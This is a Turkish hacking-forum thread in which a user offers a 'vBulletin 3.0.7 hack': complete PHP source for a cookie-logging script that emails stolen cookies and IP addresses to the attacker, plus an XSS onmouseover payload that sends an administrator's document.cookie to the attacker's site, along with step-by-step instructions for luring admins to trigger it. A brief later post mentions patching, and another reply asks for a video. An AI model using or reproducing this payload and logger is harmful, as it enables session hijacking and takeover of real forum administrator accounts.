Vbulletin 3.0.7 Hack

  • Konbuyu başlatan Arsenik-tht
  • Başlangıç tarihi
A

Arsenik-tht

Ziyaretçi
arkadaşlar sizlerde biliyorsunuzki forumların hashları kırılmıyor.
Size vereceğim kod admin hAsh ınıda buluyor .
Admin hash ını kırmaya gerek kalmadan forumlara admin olarak girmeyi sağlıyor
. çok dikkatli yapmanızı rica ediyorum.

Kod:
<?php /* S4aLog v1.0 [ Beta ] ----------------------- **Beta Of S4aLog v1.0 With Str_Repalce <;> ! You Can Get Cookies And Refresh The Broweser ! v0.10 [ New New New ] !Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies [ MSG ] Name : Attack1 Cookies : Cookies Refresh : http://www.s4a.xx [ MSG ]! ! Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121; ! [ New New New ] */ $YourMail = [EMAIL="[email protected]"][email protected][/EMAIL];  // Your E-mail /*-----------------------*/ $Ip = $REMOTE_ADDR; $Cooki_e = $_GET['id']; $NameOfAttack = $_GET['nm']; $Refresh = $_GET['re']; /* Start */ $ReplaceCookie1 = array("=",";"); $ReplaceCookie2 = array("[ "," ]  "); $Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki_e); // Replace /* e.x hash=0210; | hash[0210]*/ //***************************************// $Hdr = "From: Sabotaj Farkıyla  [EMAIL="[email protected]"][email protected][/EMAIL]"; $Msg = " Mr Attacker ;) ,,, S4aLog v1 Beta << [ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page [ ".$Ip." ] ,, Ip [ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ] [ [EMAIL="[email protected]"][email protected][/EMAIL] - [EMAIL="[email protected]"][email protected][/EMAIL] ] ----------------------------------------------- Cookie :: ".$Cooki_e." "; /* ------------------------------------------------------------------------- */ $Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr); /**************************************************      ***************************/ if($Send){ if($Refresh <> ""){header("location:".$Refresh);} } ?>

burda gördüğünüz kodları bir alın ve Php destekli bir web sayfasının içersine bu kodları atın ama içersindeki [email protected]
adresini değiştirin bölece size gelecek olan email bana gelmesin log.php şeklinde sitenize koyun.
Bu kod cookie, ip, dbuser, dbpass, autologin, userid, Banner gibi bilgilerin size gelmesini sağlıyacak.
bu kodları çalıştırmak için hacklenecek siteye ihtiyacımız var Vbullet 3.0.7 siteleri buluyoruz oraya üye oluyoruz vePm kısmına yazabilirsiniz vereceğim kodu
yada forum a yeni bir konu açarak dikkat çekici bir yazı ile site adminin oraya girmesini sağlıyacağız yada admine özel msj şeklindede olabilir.

onmouseover='location.href="http://www.siteniz.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'


----> "http://www.siteniz.com/log.php" kendi adresinizi yazıyorsunuz..

Kod bu arkadaşlar bunu forum a yada admine mesaj olarak atacaksınız.
bölece size her türlü bilgisi elinize ulaşmış olacak.en sonundada size bi mail gelecek.
 
A

Arsenik-tht

Ziyaretçi
bu açığı ya yayınlanan patchlerle yada en son sanırım 3.0.12 versiyonu var ona upgrade etmeniz daha iyi olur. son verrsiyonlar daha güvenlidir.
 

hopix

Yeni üye
26 Şub 2006
5
0
Abi ben bi nane anlamadım çok karışık bide video çekip koyarsan züpper olur haa sağol....
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.